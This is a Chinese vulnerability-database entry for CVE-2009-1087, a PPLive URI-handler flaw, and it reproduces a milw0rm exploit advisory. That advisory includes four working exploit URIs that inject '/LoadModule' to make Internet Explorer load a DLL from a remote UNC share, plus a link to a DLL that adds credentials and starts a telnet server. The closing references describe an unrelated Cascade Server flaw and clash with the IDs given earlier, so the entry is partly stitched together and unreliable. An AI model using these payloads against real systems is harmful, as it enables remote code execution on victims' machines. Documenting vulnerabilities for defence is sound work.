投稿
https://www.exploit-db.com/exploits/8215
https://www.securityfocus.com/bid/34128
https://cxsecurity.com/issue/WLB-2009030236
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-431
PPLive URI处理器LoadModule参数多个代码执行漏洞
| 漏洞ID | 1117477 | 漏洞类型 | 输入验证 |
| 发布时间 | 2009-03-16 | 更新时间 | 2009-04-07 |
 CVE编号
|
CVE-2009-1087 |  CNNVD-ID
|
CNNVD-200903-431 |
| 漏洞平台 | Windows | CVSS评分 | 9.3 |
|漏洞来源
|漏洞详情
PPLive是非常流行的P2P网络视频客户端。PPLive的synacast://、Play://、pplsv://和ppvod://URI处理器在评估命令行参数时没有正确地验证URI参数,如果用户受骗跟随的链接中包含有特制的/LoadModule参数的话,就可能导致InternetExplorer加载远程VNC路径所指定的dll。
|漏洞EXP
--------------------------------------------------------------------------------
PPLive <= 1.9.21 uri handlers "/LoadModule" remote argument injection
by Nine:Situations:Group::strawdog
--------------------------------------------------------------------------------
software site:http://www.pplive.com/en/index.html
our site: http://retrogod.altervista.org/
software description:
"PPLive is a peer-to-peer streaming video network created in Huazhong University
of Science and Technology, People's Republic of China. It is part of a new
generation of P2P applications, that combine P2P and Internet TV, called P2PTV."
vulnerability:
The "synacast://", "Play://" ,"pplsv://" and "ppvod://" URI handlers do not
verify certain parts of the URI before evaluating command line parameters.
This can be exploited against Internet Explorer to e.g. load a dll from a remote
UNC path via the "/LoadModule" parameter, example exploit (IE7):
synacast://www.microsoft.com/?"%20/LoadModule%20\1.2.3.4\unc_share\sh.dll%20"
Play://www.microsoft.com/?"%20/LoadModule%20\\1.2.3.4\unc_share\sh.dll%20"
against older versions:
pplsv://www.microsoft.com/?"%20/LoadModule%20\\1.2.3.4\unc_share\sh.dll%20"
ppvod://www.microsoft.com/?"%20/LoadModule%20\\1.2.3.4\unc_share\sh.dll%20"
test dll which adds new credentials / spawns the telnet server:
http://retrogod.altervista.org/9sg_pplive_sh.html
some interesting readings:
http://msdn.microsoft.com/en-us/library/aa767914(VS.85).aspx
--------------------------------------------------------------------------------
# milw0rm.com [2009-03-16]|受影响的产品
PPLive PPLive 1.9.21
|参考资料
来源:XF
名称:cascadeserver-xlst-command-execution(49332)
链接:http://xforce.iss.net/xforce/xfdb/49332
来源:BID
名称:34186
链接:http://www.securityfocus.com/bid/34186
来源:BUGTRAQ
名称:20090319CommandExecutioninHannonHillCascadeServer
链接:http://www.securityfocus.com/archive/1/archive/1/501981/100/0/threaded
来源:MILW0RM
名称:8247
链接:http://www.milw0rm.com/exploits/8247
检索漏洞
开始时间
结束时间